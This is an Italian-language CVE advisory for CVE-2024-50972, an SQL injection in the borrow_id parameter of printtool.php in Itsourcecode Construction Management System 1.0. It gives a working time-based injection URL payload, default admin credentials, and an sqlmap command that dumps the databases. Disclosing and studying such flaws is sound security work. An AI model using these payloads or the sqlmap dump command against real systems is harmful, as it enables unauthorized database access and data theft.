CVE-2024-50972
Descrizione
Una vulnerabilità di SQL injection in printtool.php di Itsourcecode Construction Management System 1.0 consente a utenti malintenzionati remoti di eseguire comandi SQL arbitrari tramite il parametro borrow_id.
Tipo di vulnerabilità
Iniezione SQL
Fornitore del prodotto
Itsourcecode
Base del codice del prodotto interessato:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
Componente interessato:
Itsourcecode Construction Management System v1.0 è vulnerabile a SQL injection tramite il parametro borrow_id nella pagina printtool.php
Vettori di attacco:
- Imposta l'applicazione localmente e accedi con le credenziali admin:admin
- Naviga al seguente URL nel tuo browser:
http://localhost/monitoring_system/printtool.php?borrow_id=5
- Inietta il payload SQL:
Modifica il parametro borrow_id nell'URL per includere un payload di SQL injection basato sul tempo.
http://localhost/monitoring_system/printtool.php?borrow_id=5'+AND+(SELECT+7254+FROM+(SELECT(SLEEP(20)))rcGT)--+xxQB
- Osserva la risposta dell'applicazione:
La pagina dovrebbe impiegare notevolmente più tempo (20 secondi) per caricarsi se l'iniezione ha successo, confermando che il parametro borrow_id è vulnerabile a SQL injection.
- Ora usa lo strumento SQLMap per un ulteriore sfruttamento e dumping dei database usando il comando seguente:
sqlmap.py -u http://localhost/monitoring_system/printtool.php?borrow_id=5 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
Riferimenti:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection